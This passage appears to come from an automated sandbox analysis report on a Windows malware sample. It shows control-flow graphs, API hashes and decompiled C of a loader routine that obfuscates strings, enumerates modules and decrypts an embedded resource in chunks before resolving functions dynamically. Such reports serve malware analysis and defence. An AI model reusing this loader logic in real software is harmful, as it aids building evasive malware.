                                                                                                                                                                                                      control_flow_graph 162 7ff9a5dc0c34-7ff9a5dc0c3b 163 7ff9a5dc0c46-7ff9a5dc0ce5 162->163 164 7ff9a5dc0c3d-7ff9a5dc0c45 162->164 168 7ff9a5dc0ce7-7ff9a5dc0cf6 163->168 169 7ff9a5dc0d40-7ff9a5dc0daa OpenServiceA 163->169 164->163 168->169 170 7ff9a5dc0cf8-7ff9a5dc0cfb 168->170 174 7ff9a5dc0db2-7ff9a5dc0de6 call 7ff9a5dc0e02 169->174 175 7ff9a5dc0dac 169->175 172 7ff9a5dc0d35-7ff9a5dc0d3d 170->172 173 7ff9a5dc0cfd-7ff9a5dc0d10 170->173 172->169 176 7ff9a5dc0d14-7ff9a5dc0d27 173->176 177 7ff9a5dc0d12 173->177 181 7ff9a5dc0de8 174->181 182 7ff9a5dc0ded-7ff9a5dc0e00 174->182 175->174 176->176 178 7ff9a5dc0d29-7ff9a5dc0d31 176->178 177->176 178->172 181->182
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: OpenService
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3098006287-0
                                                                                                                                                                                                      • Opcode ID: a57386d97c913029ffaf78abbccb1680eb617315e29cb6cb19a14e508e94cf24
                                                                                                                                                                                                      • Instruction ID: 85b3fe1d5d0064a776d59f2d2a4b4d4a229dd527058aafd3924ba79198a1e733
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a57386d97c913029ffaf78abbccb1680eb617315e29cb6cb19a14e508e94cf24
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C51C734518A4D4FDB58EF28D8467F97BE1FB59311F10412EE85EC3292DE74E8458B81
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 183 7ff9a5dc0b2d-7ff9a5dc0bb8 188 7ff9a5dc0bc2-7ff9a5dc0bc7 183->188 189 7ff9a5dc0bba-7ff9a5dc0bbf 183->189 190 7ff9a5dc0bd1-7ff9a5dc0c08 OpenSCManagerW 188->190 191 7ff9a5dc0bc9-7ff9a5dc0bce 188->191 189->188 192 7ff9a5dc0c0a 190->192 193 7ff9a5dc0c10-7ff9a5dc0c2d 190->193 191->190 192->193
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ManagerOpen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1889721586-0
                                                                                                                                                                                                      • Opcode ID: b01bf33ec24dd48d36ac41ac43179d73e081739e5379fa0c3e609751a8468359
                                                                                                                                                                                                      • Instruction ID: a7a05fc2af0a128b3c8592f3ad32a31a0de6cad86f83f104ee80115ee3c1b892
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b01bf33ec24dd48d36ac41ac43179d73e081739e5379fa0c3e609751a8468359
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA31A03190CB588FDB29DF9898596F9BBF1EB65711F00816FD08ED3252CE70A445CB81
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 194 7ff9a5dc108a-7ff9a5dc10b3 195 7ff9a5dc10b5-7ff9a5dc10bd 194->195 196 7ff9a5dc10be-7ff9a5dc1152 FindCloseChangeNotification 194->196 195->196 200 7ff9a5dc1154 196->200 201 7ff9a5dc115a-7ff9a5dc1181 196->201 200->201
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                                      • Opcode ID: 405e434b5850d397baee5c25e05ade60c3fc4e44ac6a6026f9c85a3d1f4e953e
                                                                                                                                                                                                      • Instruction ID: d565606701f0c42c677704ce6aa19d67ce0e973a3365c1562ceafb5033430661
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 405e434b5850d397baee5c25e05ade60c3fc4e44ac6a6026f9c85a3d1f4e953e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA31F43090CB889FDB0ADB7898157E97FF0EF57320F04429FD089C31A2DAA96856CB51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 23 401cb0-401cce call 401650 18->23 24 401c9c-401caf CloseHandle 18->24 20->16 22 401c85-401c8d 20->22 21->18 22->14 22->21 33 401cd0-401cd4 23->33 29 401ef3-401f1a call 401300 SizeofResource 27->29 28->29 38 401f1c-401f2f 29->38 39 401f5f-401f69 29->39 36 401cf0-401cf2 33->36 37 401cd6-401cd8 33->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->24 47 401cf9-401d09 Module32Next 42->47 43->39 50 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->50 51 401f77-401f8d call 401560 44->51 45->44 46->33 46->41 47->7 48 401d0f 47->48 52 401d10-401d2e call 401650 48->52 50->5 87 4021aa-4021c0 50->87 51->50 61 401d30-401d34 52->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->24 71 401d5d-401d7b call 401650 68->71 70->61 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 83 401da5-401da7 79->83 81 401d8a-401d90 80->81 82 401d9c-401d9e 80->82 81->79 85 401d92-401d9a 81->85 82->83 83->24 86 401dad-401dbd Module32Next 83->86 85->77 85->82 86->7 86->52 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 94 402482-402487 92->94 98 40221d-40223d 93->98 99 40244f-40245f 93->99 94->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 2eed01d 122->154 155 40234e call 2eed005 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 2eed01d 135->152 153 402390 call 2eed005 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 141 4023b6-4023b8 140->141 142 4023ba 140->142 144 4023bc-402417 VariantClear * 2 call 4019a0 141->144 142->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E004019F0(void* __edx, void* __eflags) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				void* _t337;
                                                                                                                                                                                                      				void* _t340;
                                                                                                                                                                                                      				int _t341;
                                                                                                                                                                                                      				CHAR* _t344;
                                                                                                                                                                                                      				intOrPtr* _t349;
                                                                                                                                                                                                      				int _t350;
                                                                                                                                                                                                      				long _t352;
                                                                                                                                                                                                      				signed int _t354;
                                                                                                                                                                                                      				intOrPtr _t358;
                                                                                                                                                                                                      				long _t359;
                                                                                                                                                                                                      				CHAR* _t364;
                                                                                                                                                                                                      				struct HINSTANCE__* _t365;
                                                                                                                                                                                                      				CHAR* _t366;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t367;
                                                                                                                                                                                                      				int _t368;
                                                                                                                                                                                                      				int _t369;
                                                                                                                                                                                                      				int _t370;
                                                                                                                                                                                                      				intOrPtr* _t376;
                                                                                                                                                                                                      				int _t378;
                                                                                                                                                                                                      				intOrPtr _t379;
                                                                                                                                                                                                      				intOrPtr* _t381;
                                                                                                                                                                                                      				int _t383;
                                                                                                                                                                                                      				intOrPtr* _t384;
                                                                                                                                                                                                      				int _t385;
                                                                                                                                                                                                      				int _t396;
                                                                                                                                                                                                      				int _t399;
                                                                                                                                                                                                      				int _t402;
                                                                                                                                                                                                      				int _t405;
                                                                                                                                                                                                      				intOrPtr* _t407;
                                                                                                                                                                                                      				int _t413;
                                                                                                                                                                                                      				int _t415;
                                                                                                                                                                                                      				void* _t421;
                                                                                                                                                                                                      				int _t422;
                                                                                                                                                                                                      				int _t424;
                                                                                                                                                                                                      				intOrPtr* _t428;
                                                                                                                                                                                                      				intOrPtr _t429;
                                                                                                                                                                                                      				intOrPtr* _t431;
                                                                                                                                                                                                      				int _t432;
                                                                                                                                                                                                      				int _t435;
                                                                                                                                                                                                      				intOrPtr* _t437;
                                                                                                                                                                                                      				int _t438;
                                                                                                                                                                                                      				intOrPtr* _t439;
                                                                                                                                                                                                      				int _t440;
                                                                                                                                                                                                      				int _t442;
                                                                                                                                                                                                      				signed int _t448;
                                                                                                                                                                                                      				signed int _t451;
                                                                                                                                                                                                      				signed int _t452;
                                                                                                                                                                                                      				int _t469;
                                                                                                                                                                                                      				int _t471;
                                                                                                                                                                                                      				int _t482;
                                                                                                                                                                                                      				signed int _t486;
                                                                                                                                                                                                      				intOrPtr* _t488;
                                                                                                                                                                                                      				intOrPtr* _t490;
                                                                                                                                                                                                      				intOrPtr* _t492;
                                                                                                                                                                                                      				intOrPtr _t493;
                                                                                                                                                                                                      				void* _t494;
                                                                                                                                                                                                      				struct HRSRC__* _t497;
                                                                                                                                                                                                      				void* _t514;
                                                                                                                                                                                                      				int _t519;
                                                                                                                                                                                                      				intOrPtr* _t520;
                                                                                                                                                                                                      				void* _t524;
                                                                                                                                                                                                      				void* _t525;
                                                                                                                                                                                                      				struct HINSTANCE__* _t526;
                                                                                                                                                                                                      				intOrPtr _t527;
                                                                                                                                                                                                      				void* _t531;
                                                                                                                                                                                                      				void* _t535;
                                                                                                                                                                                                      				struct HRSRC__* _t536;
                                                                                                                                                                                                      				intOrPtr* _t537;
                                                                                                                                                                                                      				intOrPtr* _t539;
                                                                                                                                                                                                      				int _t542;
                                                                                                                                                                                                      				int _t543;
                                                                                                                                                                                                      				intOrPtr* _t547;
                                                                                                                                                                                                      				intOrPtr* _t548;
                                                                                                                                                                                                      				intOrPtr* _t549;
                                                                                                                                                                                                      				intOrPtr* _t550;
                                                                                                                                                                                                      				void* _t551;
                                                                                                                                                                                                      				intOrPtr _t552;
                                                                                                                                                                                                      				int _t555;
                                                                                                                                                                                                      				void* _t556;
                                                                                                                                                                                                      				void* _t557;
                                                                                                                                                                                                      				void* _t558;
                                                                                                                                                                                                      				void* _t559;
                                                                                                                                                                                                      				void* _t560;
                                                                                                                                                                                                      				void* _t561;
                                                                                                                                                                                                      				void* _t562;
                                                                                                                                                                                                      				intOrPtr* _t563;
                                                                                                                                                                                                      				void* _t564;
                                                                                                                                                                                                      				void* _t565;
                                                                                                                                                                                                      				void* _t566;
                                                                                                                                                                                                      				void* _t567;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t567 = __eflags;
                                                                                                                                                                                                      				_t494 = __edx;
                                                                                                                                                                                                      				__imp__OleInitialize(0); // executed
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x23)) = 6;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                                                                                                                                                      				 *((char*)(_t556 + 0x38)) = 0;
                                                                                                                                                                                                      				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                                                                                                                                                      				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                                                                                                                                                      				_t557 = _t556 + 0xc;
                                                                                                                                                                                                      				if(_t337 == 0x41b2a0) {
                                                                                                                                                                                                      					L80:
                                                                                                                                                                                                      					__eflags = 0;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                                                                                                      					_t525 = _t340;
                                                                                                                                                                                                      					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x84)) = 0;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                                                                                                                                                      					 *((char*)(_t557 + 0x38)) = 0;
                                                                                                                                                                                                      					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                                                                                                                                                      					if(_t341 == 0) {
                                                                                                                                                                                                      						L38:
                                                                                                                                                                                                      						FindCloseChangeNotification(_t525); // executed
                                                                                                                                                                                                      						_t526 = GetModuleHandleA(0);
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                                                                                                                                                      						 *((char*)(_t557 + 0x3c)) = 0;
                                                                                                                                                                                                      						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                                                                                                                                                      						_t558 = _t557 + 8;
                                                                                                                                                                                                      						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                                                                                                                                                      						 *(_t558 + 0x50) = _t536;
                                                                                                                                                                                                      						_t551 = LoadResource(_t526, _t536);
                                                                                                                                                                                                      						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                                                                                                                                                      						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                                                                                                                                                      						_push(0x40022);
                                                                                                                                                                                                      						_t537 = _t349; // executed
                                                                                                                                                                                                      						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                                                                                                                                                      						_t559 = _t558 + 8;
                                                                                                                                                                                                      						 *(_t559 + 0x34) = _t350;
                                                                                                                                                                                                      						__eflags = _t350;
                                                                                                                                                                                                      						if(_t350 == 0) {
                                                                                                                                                                                                      							 *(_t559 + 0x50) = 0;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                                                                                                                                                      							_t486 =  *(_t559 + 0x40);
                                                                                                                                                                                                      							_t559 = _t559 + 0xc;
                                                                                                                                                                                                      							 *(_t559 + 0x50) = _t486;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E00401300( *(_t559 + 0x50));
                                                                                                                                                                                                      						_t497 =  *(_t559 + 0x48);
                                                                                                                                                                                                      						_t352 = SizeofResource(_t526, _t497);
                                                                                                                                                                                                      						 *(_t559 + 0x40) = _t352;
                                                                                                                                                                                                      						asm("cdq");
                                                                                                                                                                                                      						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                                                                                                                                                      						__eflags = _t354;
                                                                                                                                                                                                      						if(_t354 > 0) {
                                                                                                                                                                                                      							_t519 =  *(_t559 + 0x3c);
                                                                                                                                                                                                      							_t482 = _t537 - _t519;
                                                                                                                                                                                                      							__eflags = _t482;
                                                                                                                                                                                                      							 *(_t559 + 0x34) = _t519;
                                                                                                                                                                                                      							 *(_t559 + 0x88) = _t482;
                                                                                                                                                                                                      							 *(_t559 + 0x38) = _t354;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t424 =  *(_t559 + 0x34);
                                                                                                                                                                                                      								_push( *(_t559 + 0x88) + _t424);
                                                                                                                                                                                                      								_push(0x400);
                                                                                                                                                                                                      								_push(_t424);
                                                                                                                                                                                                      								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                                                                                                                                                      								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                                                                                                                                                      								_t179 = _t559 + 0x38;
                                                                                                                                                                                                      								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                                                                                                                                                      								__eflags =  *_t179;
                                                                                                                                                                                                      							} while ( *_t179 != 0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                                                                                                                                                      						__eflags = _t448;
                                                                                                                                                                                                      						if(_t448 < 0) {
                                                                                                                                                                                                      							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                                                                                                      							__eflags = _t448;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t448;
                                                                                                                                                                                                      						if(_t448 > 0) {
                                                                                                                                                                                                      							_t421 =  *(_t559 + 0x40) - _t448;
                                                                                                                                                                                                      							_push(_t421 + _t537);
                                                                                                                                                                                                      							_push(_t448);
                                                                                                                                                                                                      							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                                                                                                                                                      							__eflags = _t422;
                                                                                                                                                                                                      							_push(_t422);
                                                                                                                                                                                                      							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                                                                                                                                                      						_t560 = _t559 + 0xc;
                                                                                                                                                                                                      						FreeResource(_t551);
                                                                                                                                                                                                      						_t552 =  *_t537;
